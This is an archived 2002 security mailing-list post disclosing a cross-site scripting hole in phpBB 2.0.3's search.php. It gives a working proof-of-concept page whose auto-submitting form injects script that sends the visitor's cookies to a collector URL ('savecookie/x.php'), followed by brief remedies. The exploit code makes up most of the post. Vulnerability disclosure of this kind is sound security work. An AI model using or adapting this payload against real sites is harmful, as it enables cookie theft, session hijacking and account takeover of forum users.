Cross-site Scripting Vulnerability in phpBB 2.0.3

From: Fabricio Angeletti (f_a_aat_private)
Date: Tue Dec 03 2002 - 12:09:00 PST

Next message: Dan Rowles: "[Fwd: [RHSA-2002:196-09] Updated xinetd packages fix denial of service vulnerability]"

Previous message: Volker Tanger: "Proxy vulnerability in TrendMicro InterScan-VirusWall V3.6"
Next in thread: Dorin Balanica: "Input Validation Error in vbulletin 2.2.x"
Reply: Dorin Balanica: "Input Validation Error in vbulletin 2.2.x"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello :)

here is the code
----------------
<html>
<body>
<form method="post" name="search"
action="http://target/search.php?mode=searchuser">
<input type="hidden" name="search_username" value=""/>

</form>
<SCRIPT>
search.search_username.value='http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>';
document.search.submit();
</script>
</body>
</html>
------------
work for me using, IE 6 sp 1 (xp)

maybe you can do this in a better way but, this
example work realy fine

the problem is search.php when show search_username u
can put anything with a few restrictions

solution:
1 Don't show the last entry or something like that
2 filter the code :p

Bye

_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com

Next message: Dan Rowles: "[Fwd: [RHSA-2002:196-09] Updated xinetd packages fix denial of service vulnerability]"
Previous message: Volker Tanger: "Proxy vulnerability in TrendMicro InterScan-VirusWall V3.6"
Next in thread: Dorin Balanica: "Input Validation Error in vbulletin 2.2.x"
Reply: Dorin Balanica: "Input Validation Error in vbulletin 2.2.x"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Dec 05 2002 - 13:11:52 PST